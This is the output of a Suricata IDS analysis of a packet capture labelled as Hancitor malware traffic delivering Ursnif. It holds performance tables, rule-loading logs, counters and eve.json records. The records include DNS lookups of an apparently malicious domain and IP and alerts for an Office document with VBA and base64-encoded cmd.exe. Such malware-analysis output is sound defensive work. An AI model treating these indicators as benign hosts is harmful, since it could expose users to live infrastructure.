Filename: 2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 21.9562020302 seconds
Hash: 2280b037326fec8a762c9a1b32aae0ca
Uploaded: 1548933098

Logfiles


packet_stats.log - (12657 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          1031         21408539     1027265378     418217623        431.2b   29.24
 IPv4      17          1436         20851891     1028072446     726493672       1043.2b   70.76
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          1031            66872       20648310        522533        538.7m   46.94
TMM_FLOWWORKER              IPv4      17          1436           232835        9904982        390808        561.2m   48.89
TMM_RECEIVEPCAPFILE         IPv4       6          1031             2538           4295          2909          3.0m    0.26
TMM_RECEIVEPCAPFILE         IPv4      17          1436             2541        4612074          5977          8.6m    0.75
TMM_DECODEPCAPFILE          IPv4       6          1031             2652       28783100         30924         31.9m    2.78
TMM_DECODEPCAPFILE          IPv4      17          1436             2656          45140          3062          4.4m    0.38

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          1031             2829         106294          3538          3.6m  0.37  
flow                    IPv4      17          1436             2803          39228          4168          6.0m  0.61  
stream                  IPv4       6          1031             2706         315853         16447         17.0m  1.72  
app-layer               IPv4      17          1436             8038          78637         12955         18.6m  1.89  
detect                  IPv4       6          1031            44373       20208469        468608        483.1m  49.06 
detect                  IPv4      17          1436           196406         588555        315709        453.4m  46.04 
tcp-prune               IPv4       6          1031             2534          19589          2998          3.1m  0.31  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            38             4798          39527         21483        816.4k  12.62 
dns                     IPv4      17          1436             2678          26781          3936          5.7m  87.38 
Proto detect            IPv4      17          1410             2905          33105          3717          5.2m

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            34            29703          95128         46025          1.6m  2.05  
LOGGER_ALERT_FAST           IPv4      17             5            16715          31513         26650        133.3k  0.17  
LOGGER_UNIFIED2             IPv4       6            34            25248         193952         52707          1.8m  2.35  
LOGGER_UNIFIED2             IPv4      17             5            20437          35810         29860        149.3k  0.20  
LOGGER_JSON_ALERT           IPv4       6            34            52196         123103         73425          2.5m  3.27  
LOGGER_JSON_ALERT           IPv4      17             5            36053          41861         39068        195.3k  0.26  
LOGGER_JSON_DNS             IPv4      17          1278            23821        9204639         47957         61.3m  80.33 
LOGGER_JSON_HTTP            IPv4       6            55            35434         157169         57614          3.2m  4.15  
LOGGER_JSON_FILE            IPv4       6            82            45106         130879         67139          5.5m  7.22  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           608             2593         408486         23075        14.0m  10.94 
payload                           IPv4      17          1436             3409          65459          7754        11.1m  8.68  
stream                            IPv4       6           608             2530       12951596         55411        33.7m  26.27 
http_uri                          IPv4       6            55             5281          73441         17550       965.3k  0.75  
http_request_line                 IPv4       6            55             3842          56432          6719       369.6k  0.29  
http_client_body                  IPv4       6            57             2722          59731         17626         1.0m  0.78  
http_header (request)             IPv4       6            55            17701         105052         53052         2.9m  2.28  
http_header (request trailer)     IPv4       6            55             2586          17934          2953       162.4k  0.13  
http_header_names (request)       IPv4       6            55             7666          53711         18384         1.0m  0.79  
http_accept (request)             IPv4       6            55             2875          24233          4130       227.2k  0.18  
http_referer (request)            IPv4       6            55             2803          18413          3713       204.2k  0.16  
http_content_len (request)        IPv4       6            55             2875          18615          4644       255.4k  0.20  
http_content_type (request)       IPv4       6            55             2801          38241          7374       405.6k  0.32  
http_protocol (request)           IPv4       6            55             3372          18971          4994       274.7k  0.21  
http_start (request)              IPv4       6            55             6901          31168         12294       676.2k  0.53  
http_raw_header (request)         IPv4       6            57             7909          27905         12739       726.1k  0.57  
http_method                       IPv4       6            55             3463          33706          5834       320.9k  0.25  
http_cookie (request)             IPv4       6            55             2905         609382         14576       801.7k  0.63  
http_raw_uri                      IPv4       6            55             3199          11241          5161       283.9k  0.22  
http_user_agent                   IPv4       6            55             8439          41260         19823         1.1m  0.85  
http_host                         IPv4       6            55             3735          10344          6606       363.4k  0.28  
dns_query                         IPv4      17           658             2770          57721          3763         2.5m  1.93  
http_response_line                IPv4       6            55             3263          20885          6623       364.3k  0.28  
http_header (response)            IPv4       6            55             7725          57390         30965         1.7m  1.33  
http_header (response trailer)    IPv4       6            55             2626          16121          4525       248.9k  0.19  
http_content_type (response)      IPv4       6            55             3601          10432          6605       363.3k  0.28  
http_raw_header (response)        IPv4       6           432             3916          27107          4924         2.1m  1.66  
http_cookie (response)            IPv4       6            55             2906          18087          3889       213.9k  0.17  
http_stat_code                    IPv4       6            55             2785          27774          4135       227.4k  0.18  
file_data (http response)         IPv4       6           377             2567        6278700        131578        49.6m  38.68 
Total                             IPv4                  5443                                         23561       128.2m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            76             7688          73551         30126          2.3m  0.19  
PROF_DETECT_IPONLY          IPv4      17          1276             3308         101958         26686         34.1m  2.87  
PROF_DETECT_RULES           IPv4       6          1031             2527       18863633        272089        280.5m  23.64 
PROF_DETECT_RULES           IPv4      17          1436           126215         421636        199689        286.8m  24.17 
PROF_DETECT_STATEFUL_START    IPv4       6           482             5098       18408456        313774        151.2m  12.75 
PROF_DETECT_STATEFUL_START    IPv4      17             5            12494          30688         16312         81.6k  0.01  
PROF_DETECT_STATEFUL_CONT    IPv4       6          1031             2512         413967         12785         13.2m  1.11  
PROF_DETECT_STATEFUL_CONT    IPv4      17          1436             5740          90098          6341          9.1m  0.77  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           879             2551          33530          2893          2.5m  0.21  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17          1436             2546          28806          2843          4.1m  0.34  
PROF_DETECT_PREFILTER       IPv4       6          1031             7828       13794774        140965        145.3m  12.25 
PROF_DETECT_PREFILTER       IPv4      17          1436            24766         103378         37840         54.3m  4.58  
PROF_DETECT_PF_PAYLOAD      IPv4       6           608            15137       12962873         86870         52.8m  4.45  
PROF_DETECT_PF_PAYLOAD      IPv4      17          1436             8458          70762         13251         19.0m  1.60  
PROF_DETECT_PF_TX           IPv4       6           879             2562        6293965         86501         76.0m  6.41  
PROF_DETECT_PF_TX           IPv4      17           810             2553          64310          8286          6.7m  0.57  
PROF_DETECT_PF_SORT1        IPv4       6           432             2540          28113          4602          2.0m  0.17  
PROF_DETECT_PF_SORT1        IPv4      17          1436             2780          30321          3657          5.3m  0.44  
PROF_DETECT_PF_SORT2        IPv4       6          1031             2520          44935          3088          3.2m  0.27  
PROF_DETECT_PF_SORT2        IPv4      17          1436             2610          63871          3106          4.5m  0.38  
PROF_DETECT_NONMPMLIST      IPv4       6          1031             2525          51439          3116          3.2m  0.27  
PROF_DETECT_NONMPMLIST      IPv4      17          1436             2566          41809          2995          4.3m  0.36  
PROF_DETECT_ALERT           IPv4       6          1031             2516          40409          2864          3.0m  0.25  
PROF_DETECT_ALERT           IPv4      17          1436             2520          23675          2820          4.1m  0.34  
PROF_DETECT_CLEANUP         IPv4       6          1031             2549          37212          3075          3.2m  0.27  
PROF_DETECT_CLEANUP         IPv4      17          1436             2514          35924          3096          4.4m  0.37  
PROF_DETECT_GETSGH          IPv4       6          1031             2513          34706          3135          3.2m  0.27  
PROF_DETECT_GETSGH          IPv4      17          1436             2533          48958          5591          8.0m  0.68  


suricata-report-2019-01-31-T-11-12-00-01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap.txt - (17845 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/2280b037326fec8a762c9a1b32aae0ca56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap -vvv -k none
elapsedtime:21.063626
stderr:
stdout:
31/1/2019 -- 11:11:39 - <Info> - Configuration node 'rule-files' redefined.
31/1/2019 -- 11:11:39 - <Notice> - This is Suricata version 4.0.0 RELEASE
31/1/2019 -- 11:11:39 - <Info> - CPUs/cores online: 1
31/1/2019 -- 11:11:39 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32087 and 'request-body-inspect-window' set to 16142 after randomization.
31/1/2019 -- 11:11:39 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31704 and 'response-body-inspect-window' set to 15941 after randomization.
31/1/2019 -- 11:11:39 - <Config> - DNS request flood protection level: 500
31/1/2019 -- 11:11:39 - <Config> - DNS per flow memcap (state-memcap): 524288
31/1/2019 -- 11:11:39 - <Config> - DNS global memcap: 16777216
31/1/2019 -- 11:11:39 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
31/1/2019 -- 11:11:39 - <Config> - preallocated 1000 hosts of size 136
31/1/2019 -- 11:11:39 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
31/1/2019 -- 11:11:39 - <Config> - using magic-file /usr/share/file/magic
31/1/2019 -- 11:11:39 - <Config> - Core dump size is unlimited.
31/1/2019 -- 11:11:39 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
31/1/2019 -- 11:11:39 - <Config> - preallocated 1000 defrag trackers of size 168
31/1/2019 -- 11:11:39 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
31/1/2019 -- 11:11:39 - <Config> - stream "prealloc-sessions": 2048 (per thread)
31/1/2019 -- 11:11:39 - <Config> - stream "memcap": 33554432
31/1/2019 -- 11:11:39 - <Config> - stream "midstream" session pickups: disabled
31/1/2019 -- 11:11:39 - <Config> - stream "async-oneside": disabled
31/1/2019 -- 11:11:39 - <Config> - stream "checksum-validation": disabled
31/1/2019 -- 11:11:39 - <Config> - stream."inline": disabled
31/1/2019 -- 11:11:39 - <Config> - stream "bypass": disabled
31/1/2019 -- 11:11:39 - <Config> - stream "max-synack-queued": 5
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "memcap": 134217728
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "depth": 0
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "toserver-chunk-size": 2485
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "toclient-chunk-size": 2581
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly.raw: enabled
31/1/2019 -- 11:11:39 - <Config> - stream.reassembly "segment-prealloc": 2048
31/1/2019 -- 11:11:39 - <Config> - Delayed detect disabled
31/1/2019 -- 11:11:39 - <Config> - pattern matchers: MPM: ac, SPM: bm
31/1/2019 -- 11:11:39 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
31/1/2019 -- 11:11:39 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
31/1/2019 -- 11:11:39 - <Config> - prefilter engines: MPM
31/1/2019 -- 11:11:39 - <Config> - IP reputation disabled
31/1/2019 -- 11:11:39 - <Perf> - Registered 148 keyword profiling counters.
31/1/2019 -- 11:11:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
31/1/2019 -- 11:11:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
31/1/2019 -- 11:11:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
31/1/2019 -- 11:11:44 - <Config> - No rules loaded from ET-icmp.rules.
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
31/1/2019 -- 11:11:44 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
31/1/2019 -- 11:11:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
31/1/2019 -- 11:11:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
31/1/2019 -- 11:11:45 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
31/1/2019 -- 11:11:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
31/1/2019 -- 11:11:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
31/1/2019 -- 11:11:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
31/1/2019 -- 11:11:49 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
31/1/2019 -- 11:11:50 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
31/1/2019 -- 11:11:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
31/1/2019 -- 11:11:51 - <Config> - No rules loaded from local.rules.
31/1/2019 -- 11:11:51 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
31/1/2019 -- 11:11:51 - <Info> - Threshold config parsed: 0 rule(s) found
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tcp-packet
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tcp-stream
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for udp-packet
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for other-ip
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_uri
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_client_body
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_header_names
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_accept
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_accept_enc
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_accept_lang
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_referer
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_connection
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_len
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_content_type
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_start
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_header
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_method
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_cookie
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_uri
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_user_agent
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_host
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_raw_host
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_stat_msg
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_stat_code
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for dns_query
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_sni
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_cert_issuer
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_cert_subject
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for tls_cert_serial
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for dce_stub_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_protocol
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for ssh_software
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for file_data
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_request_line
31/1/2019 -- 11:11:52 - <Perf> - using shared mpm ctx' for http_response_line
31/1/2019 -- 11:11:52 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
31/1/2019 -- 11:11:52 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
31/1/2019 -- 11:11:52 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
31/1/2019 -- 11:11:52 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
31/1/2019 -- 11:11:52 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
31/1/2019 -- 11:11:52 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
31/1/2019 -- 11:11:52 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
31/1/2019 -- 11:11:52 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
31/1/2019 -- 11:11:56 - <Perf> - Unique rule groups: 104
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toserver TCP packet": 35
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toclient TCP packet": 17
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toserver TCP stream": 33
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toclient TCP stream": 19
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toserver UDP packet": 27
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "toclient UDP packet": 17
31/1/2019 -- 11:11:56 - <Perf> - Builtin MPM "other IP packet": 3
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_uri": 14
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_request_line": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_client_body": 6
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_response_line": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_header": 10
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_header": 6
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_header_names": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_accept": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_referer": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_content_len": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_content_type": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_content_type": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_protocol": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_start": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_method": 5
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_cookie": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_cookie": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver http_host": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver dns_query": 4
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver tls_sni": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toserver file_data": 1
31/1/2019 -- 11:11:56 - <Perf> - AppLayer MPM "toclient file_data": 7
31/1/2019 -- 11:11:58 - <Perf> - Registered 39590 rule profiling counters.
31/1/2019 -- 11:11:58 - <Info> - fast output device (regular) initialized: alert
31/1/2019 -- 11:11:58 - <Info> - eve-log output device (regular) initialized: eve.json
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'alert'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'http'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'dns'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'tls'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'files'
31/1/2019 -- 11:11:58 - <Config> - enabling 'eve-log' module 'ssh'
31/1/2019 -- 11:11:58 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
31/1/2019 -- 11:11:58 - <Info> - stats output device (regular) initialized: stats.log
31/1/2019 -- 11:11:58 - <Config> - AutoFP mode using "Hash" flow load balancer
31/1/2019 -- 11:11:58 - <Info> - reading pcap file /var/pcap/01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap
31/1/2019 -

This file has been truncated.


stats.log - (3007 bytes)
------------------------------------------------------------------------------------
Date: 1/31/2019 -- 11:12:00 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2467
decoder.bytes                              | Total                     | 728382
decoder.ipv4                               | Total                     | 2467
decoder.ethernet                           | Total                     | 2467
decoder.tcp                                | Total                     | 1031
decoder.udp                                | Total                     | 1436
decoder.avg_pkt_size                       | Total                     | 295
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 38
flow.udp                                   | Total                     | 657
tcp.sessions                               | Total                     | 38
tcp.syn                                    | Total                     | 38
tcp.synack                                 | Total                     | 38
detect.alert                               | Total                     | 39
detect.mpm_list                            | Total                     | 11
detect.nonmpm_list                         | Total                     | 3
detect.fnonmpm_list                        | Total                     | 3
detect.match_list                          | Total                     | 14
app_layer.flow.http                        | Total                     | 38
app_layer.tx.http                          | Total                     | 55
app_layer.flow.dns_udp                     | Total                     | 657
app_layer.tx.dns_udp                       | Total                     | 658
flow_mgr.closed_pruned                     | Total                     | 1
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 16
flow_mgr.flows_notimeout                   | Total                     | 15
flow_mgr.flows_timeout                     | Total                     | 1
flow_mgr.flows_removed                     | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65520
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7079200


eve.json - (619412 bytes)
{"timestamp":"2019-01-16T17:47:20.705053+0000","flow_id":1935215327494685,"pcap_cnt":1,"event_type":"dns","src_ip":"10.1.16.101","src_port":63962,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15403,"rrname":"auctionhauz.ca","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:47:20.959995+0000","flow_id":1935215327494685,"pcap_cnt":2,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":63962,"proto":"UDP","dns":{"type":"answer","id":15403,"rcode":"NOERROR","rrname":"auctionhauz.ca","rrtype":"A","ttl":599,"rdata":"47.74.2.183"}}
{"timestamp":"2019-01-16T17:47:23.843622+0000","flow_id":2003513897429348,"pcap_cnt":41,"event_type":"alert","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-16T17:47:25.868768+0000","flow_id":2003513897429348,"pcap_cnt":60,"event_type":"alert","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
